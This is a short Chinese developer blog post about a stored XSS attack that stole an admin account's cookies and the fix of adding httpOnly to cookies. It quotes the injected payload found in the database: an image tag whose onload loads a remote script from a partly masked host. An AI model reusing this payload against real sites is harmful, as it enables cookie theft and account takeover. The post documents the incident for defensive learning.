xss-javascript被攻击系列--(一)

终于可以挤个空档,写写这些日子的惨痛经历。


某天产品A突然喊到,admin账号被盗了,导致金钱丢失了。瞬间头皮发麻,完蛋了。


赶紧排查可能出现漏洞的地方,在数据库中找到了攻击数据如下:


[p][img srC=\"/project//emotion/images/tsj/t_0004.gif\" οnlοad=\"jQuery.getScript('https://x.****.com/kuF4')\"/][/p]



项目中有富文本编辑器,编辑器在提交时已经将脚本关键字过滤掉了。


god! 攻击者直接攻击接口,将恶意数据插入到了库里,在展示此页面的数据时必定会加载以及执行代码中的相关脚本。


分析下js脚本中的内容是直接窃取用户登录cookies的。


去看项目相关cookies,没有设置httpOnly,这样用户登录信息对所有站点脚本就是完全公开的,攻击者拿到cookies轻而易举。攻击内容中添加有吸引力的内容,用户去访问有问题网页的概率会大大增加,用户丢失信息是必然。


服务器端补上了httpOnly属性,这个洞算是堵上了。


可脚本还是会执行这个问题得解决呀,怎么办呢?下一篇继续


有什么好的建议,多多交流哟。

你可能感兴趣的:(xss-javascript被攻击系列--(一))